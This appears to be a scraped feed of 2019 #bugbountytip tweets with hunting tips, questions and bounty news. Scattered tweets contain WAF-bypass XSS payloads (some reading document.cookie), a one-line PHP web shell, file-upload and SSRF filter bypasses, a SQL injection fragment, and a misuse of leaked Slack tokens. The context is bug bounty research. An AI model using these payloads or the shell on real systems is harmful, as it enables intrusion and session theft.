0 #Electroneum #ETN $ETN is looking for Bug bounty hounters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3

@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extention (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extentions like: php[3-n],phtml, pht. 2) whitelising: use null-byte:shell.php%00.gif use double extention format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me: ---------- import mmh3 import requests response = requests.get('https://yourwebsite/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print hash ---------- #Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇨🇦
@aussan_m


2019-09-09 12:33:12
0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so lets have a poll! What suites you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip:Access the site without loging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Conetent-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar Amer🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can recieve the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email.I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. what is the problem? How can i bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 is is not difficult to bypass #XSS filters. remamber that firewall is a stupid device,just edit a s simple part of the payload . you can use encoding,tag modifiers. and a lot other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the bests PoC’s #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 how can i redirect xhr login page? İf i capture request with burp , web page redirecting other web page. But i cant do it wih url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep intresting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐️!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now more faster than previous version. It can now detect server. you can write output in csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word--lists. E.g '53CURI7Y' is much secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇨🇦
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby ​​software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇨🇮
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails target, many people don't try XSS tests by knowing that Rails by default doesn't reflect without escape/encode. But "security concious" devs mistake the "html_safe" method of rails for escaping while it does the exact reverse thing. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: “You know what, I’m really curious what the methodology for finding bugs that an average bug hunter who focuses on depth rather breath looks like!” Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum 🇹🇳
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb I barely knew what http requests look like, 14 duplicates and 4 N/A before my first valid report, don't quit, every minute, every inspected http request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 i think you should visite my repository ,you may find something useful about hacking & pentesting & cybersecurity & redteam & malware. almost 2000 link & almost 1000 article as pdf files. enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-20 19:03:48
0 yay I found Jira Dashboard at @Hacker0x01 #DOD Exploiting Jira Dashboard Leads to (RCE) This report waiting a Disclosed / Fixed and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas 🇨🇮
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardoced host download (indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tips from Nahamsec @NahamSec curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec 🚀
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip 🥳🥳😇"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


